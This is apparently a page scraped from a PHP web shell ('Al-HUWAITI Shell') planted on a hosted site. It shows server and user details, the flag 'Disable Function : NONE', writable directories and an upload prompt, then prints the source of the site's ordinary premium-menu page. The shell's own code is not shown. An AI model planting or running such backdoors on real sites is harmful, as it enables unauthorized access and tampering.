Al-HUWAITI Shell
Al-huwaiti


Server : LiteSpeed
System : Linux us-phx-web1202.main-hosting.eu 4.18.0-553.84.1.lve.el8.x86_64 #1 SMP Tue Nov 25 18:33:03 UTC 2025 x86_64
User : u615232177 ( 615232177)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/u615232177/domains/bond-lounge.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/u615232177/domains/bond-lounge.com/public_html/premium.php
<?php session_start();
$page_name = basename($_SERVER['PHP_SELF']);
$page_title = "Premium Menu";
$page_header = "about_header.jpg";
include("header.php"); ?>
<title><?php echo $company_name; ?> - <?php echo $page_title; ?></title>
<?php include("page_header.php"); ?>
<br><br>

<!--FAQ One Start-->
<section class="faq-one">
            <div class="container">
                <div class="row">
                    <div class="col-xl-12 col-lg-12">
                        <div class="faq-one__single">
                            <div class="accrodion-grp faq-one-accrodion" data-grp-name="faq-one-accrodion-1">
<div class='row'>

        <div class='col-6'>
            <?php 
            /*
            //get the pdfs from the database
            $query = "SELECT pdf FROM pdf_menus WHERE title='VIP Food'";
            $result = mysqli_query($con, $query);
            if ($result && mysqli_num_rows($result) > 0) {
                $row = mysqli_fetch_assoc($result);
                $pdf_link = $row['pdf'];
                echo "<a href='pdfs/$pdf_link'  class='thm-btn about-one__btn'>VIP Food Menu</a>";
            } else {
                echo "<a href='#' class='thm-btn about-one__btn'>VIP Food Menu Not Available</a>";
            }
            */
            ?>
        <a href="premium_food"  class="thm-btn about-one__btn">Premium Food Menu</a>
        </div>  



        <div class='col-6'>
            <?php
            /*
            //get the pdfs from the database
            $query = "SELECT pdf FROM pdf_menus WHERE title='VIP Drinks'";
            $result = mysqli_query($con, $query);
            if ($result && mysqli_num_rows($result) > 0) {
                $row = mysqli_fetch_assoc($result);
                $pdf_link = $row['pdf'];
                echo "<a href='pdfs/$pdf_link'  class='thm-btn about-one__btn'>Premium Drinks Menu</a>";
            } else {
                echo "<a href='#' class='thm-btn about-one__btn'>Premium Drinks Menu Not Available</a>";
            }
            */
            ?>
        <a href="premium_drinks"  class="thm-btn about-one__btn">Premium Drinks Menu</a>
        </div>  

</div>
                            </div>
                        </div>
                    </div>
                    
                </div>
            </div>
        </section>
        <!--FAQ One End-->
<?php include("footer.php"); ?>

Al-HUWAITI Shell